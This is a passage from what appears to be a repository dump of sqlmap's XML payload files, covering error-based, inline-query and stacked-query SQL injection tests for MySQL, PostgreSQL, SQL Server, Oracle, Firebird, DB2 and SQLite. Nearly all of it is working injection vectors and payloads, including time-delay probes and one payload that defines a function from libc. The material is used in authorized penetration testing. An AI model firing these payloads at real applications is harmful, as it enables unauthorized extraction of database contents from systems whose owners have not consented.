(EXP)</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)))s)</vector>\n        <request>\n            <payload>,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)))s)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.5</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>\n        <request>\n            <payload>,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.6</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))))x)</vector>\n        <request>\n            <payload>,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))))x)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.7.8</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>\n        <request>\n            <payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>\n        <request>\n            <payload>,EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>\n        <request>\n            <payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)</vector>\n        <request>\n            <payload>,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 4.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL error-based - ORDER BY, GROUP BY clause</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>\n        <request>\n            <payload>,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>\n        <request>\n            <payload>,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>3</clause>\n        <where>1</where>\n        <vector>,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>\n        <request>\n            <payload>,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle error-based - ORDER BY, GROUP BY clause</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>\n        <request>\n            <payload>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Firebird error-based - ORDER BY clause</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>3</clause>\n        <where>1</where>\n        <vector>,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>\n        <request>\n            <payload>,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Firebird</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>IBM DB2 error-based - ORDER BY clause</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>3</clause>\n        <where>1</where>\n        <vector>,RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>,RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>IBM DB2</dbms>\n        </details>\n    </test>\n    <!--\n         TODO: if possible, add payload for SQLite, Microsoft Access\n         and SAP MaxDB - no known techniques at this time\n    -->\n    <!-- End of error-based tests - ORDER BY, GROUP BY clause -->\n\n    <!-- Error-based tests - stacking -->\n    <test>\n        <title>Microsoft SQL Server/Sybase error-based - Stacking (EXEC)</title>\n        <stype>2</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]');EXEC @[RANDSTR]</vector>\n        <request>\n            <payload>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]');EXEC @[RANDSTR]</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n    <!-- End of error-based tests - stacking -->\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/payloads/inline_query.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<root>\n    <!-- Inline queries tests -->\n    <test>\n        <title>Generic inline queries</title>\n        <stype>3</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,2,3,8</clause>\n        <where>3</where>\n        <vector>(SELECT CONCAT(CONCAT('[DELIMITER_START]',([QUERY])),'[DELIMITER_STOP]'))</vector>\n        <request>\n            <payload>(SELECT CONCAT(CONCAT('[DELIMITER_START]',(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n    </test>\n\n    <test>\n        <title>MySQL inline queries</title>\n        <stype>3</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,8</clause>\n        <where>3</where>\n        <vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>\n        <request>\n            <payload>(SELECT CONCAT('[DELIMITER_START]',(ELT([RANDNUM]=[RANDNUM],1)),'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL inline queries</title>\n        <stype>3</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,8</clause>\n        <where>3</where>\n        <vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase inline queries</title>\n        <stype>3</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,8</clause>\n        <where>3</where>\n        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>(SELECT '[DELIMITER_START]'+(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)+'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle inline queries</title>\n        <stype>3</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,8</clause>\n        <where>3</where>\n        <vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>\n        <request>\n            <!-- NOTE: Vertica works too without the TO_NUMBER() -->\n            <payload>(SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END)||'[DELIMITER_STOP]' FROM DUAL)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>SQLite inline queries</title>\n        <stype>3</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,8</clause>\n        <where>3</where>\n        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>\n        <request>\n            <payload>SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)||'[DELIMITER_STOP]'</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>SQLite</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Firebird inline queries</title>\n        <stype>3</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,8</clause>\n        <where>3</where>\n        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>\n        <request>\n            <payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Firebird</dbms>\n        </details>\n    </test>\n    <!-- End of inline queries tests -->\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/payloads/stacked_queries.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<root>\n    <!-- Stacked queries tests -->\n    <test>\n        <title>MySQL &gt;= 5.0.12 stacked queries (comment)</title>\n        <stype>4</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>\n        <request>\n            <payload>;SELECT SLEEP([SLEEPTIME])</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0.12 stacked queries</title>\n        <stype>4</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>\n        <request>\n            <payload>;SELECT SLEEP([SLEEPTIME])</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n     <test>\n        <title>MySQL &gt;= 5.0.12 stacked queries (query SLEEP - comment)</title>\n        <stype>4</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>\n        <request>\n            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0.12 stacked queries (query SLEEP)</title>\n        <stype>4</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>\n        <request>\n            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &lt; 5.0.12 stacked queries (BENCHMARK - comment)</title>\n        <stype>4</stype>\n        <level>3</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>\n        <request>\n            <payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &lt; 5.0.12 stacked queries (BENCHMARK)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>\n        <request>\n            <payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL &gt; 8.1 stacked queries (comment)</title>\n        <stype>4</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n            <dbms_version>&gt; 8.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL &gt; 8.1 stacked queries</title>\n        <stype>4</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n            <dbms_version>&gt; 8.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL stacked queries (heavy query - comment)</title>\n        <stype>4</stype>\n        <level>2</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL stacked queries (heavy query)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc - comment)</title>\n        <stype>4</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n            <dbms_version>&lt; 8.2</dbms_version>\n            <os>Linux</os>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n            <dbms_version>&lt; 8.2</dbms_version>\n            <os>Linux</os>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase stacked queries (comment)</title>\n        <stype>4</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>\n        <request>\n            <payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)</title>\n        <stype>4</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>\n        <request>\n            <payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase stacked queries</title>\n        <stype>4</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>\n        <request>\n            <payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase stacked queries (DECLARE)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>\n        <request>\n            <payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>\n        <stype>4</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>\n        <request>\n            <payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>\n        <stype>4</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>\n        <request>\n            <payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM 